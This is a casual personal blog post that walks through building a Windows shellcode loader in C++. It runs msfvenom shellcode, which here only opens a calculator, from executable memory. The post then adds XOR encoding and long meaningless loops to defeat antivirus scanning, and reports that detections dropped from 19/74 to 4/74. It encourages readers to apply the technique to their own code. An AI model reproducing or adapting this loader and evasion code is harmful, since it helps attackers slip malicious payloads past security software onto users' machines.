Post

popping a calc on windows

popping a calc :o

Posted Updated
By whywhy
2 min read

beginnings

i wanted to open a calculator

getting started

so first i create a c++ project and write some code to pop a calc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

int main() {
    void *exec = VirtualAlloc(
        nullptr, 
        shellcode_size, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE
    );
    
    if (exec == NULL) {
        return 1;
    }

    RtlMoveMemory(exec, shellcode, shellcode_size);

    ((void(*)())exec)();
    return 0;
}

oops!

ohno my code no work :(

what happened

  1. i forgot to specify x64 when making shellcode with msfvenom
  2. i forgot to add execute to page permissions

this took me about 30-40 minutes in total to fix :)

anyways, defender (obviously) caught it, so what next?

silly stuff

antiviruses aim to provide protection without disrupting user experience, so it cannot spend too much time on one file. if the program contains a lot of loops it’d eat up too much resources or something (read it in some strange document from ages ago)

anyways all i did was add a little loop before my program started (and xored the shellcode)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

int main() {
    int a = 0, b = 0;
    std::random_device rand;
    std::mt19937 gen(rand());
    std::uniform_int_distribution<int> rng(0, INT_MAX);

    for (int i = 0; i < INT_MAX - 1; i++) {
        a++;
    }

    if (a != INT_MAX - 1) {
        return 1;
    }

    int res;

    for (int i = 0; i < INT_MAX - 1; i++) {
        b = rng(gen);
        res = a ^ b;
        a & 0xFFFFFFFF;
    }

    res = b;
    a = res;


    xor_decrypt(shellcode, key, shellcode_size, key_size);

    void *exec = VirtualAlloc(
        nullptr, 
        shellcode_size, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE
    );
    if (exec == NULL) {
        return 1;
    }


    RtlMoveMemory(exec, shellcode, shellcode_size);

    ((void(*)())exec)();
    return 0;
}

the loop is completely meaningless, but the antivirus must look at it anyway since it does some operations, which in theory would make it give up on scanning the file

conclusion

my theory must have been pretty close, because i dropped detections from 19/74 to 4/74

while this is nothing special, it was a fun little project to do pre-workout. :D now that it’s on virustotal tho rip this code, please do not be surprised when you try this 6 months later and it gets flagged to oblivion :(

instead, take the ideas here and apply it to your own!!

credits

  • thankyou gatari for telling me that i Do Not need to mess with virtualprotect
  • msfvenom for the shellcode
  • chat gpt for the xor code
windows, malware
cyber
This post is licensed under CC BY 4.0 by the author.

Trending Tags

cyber misc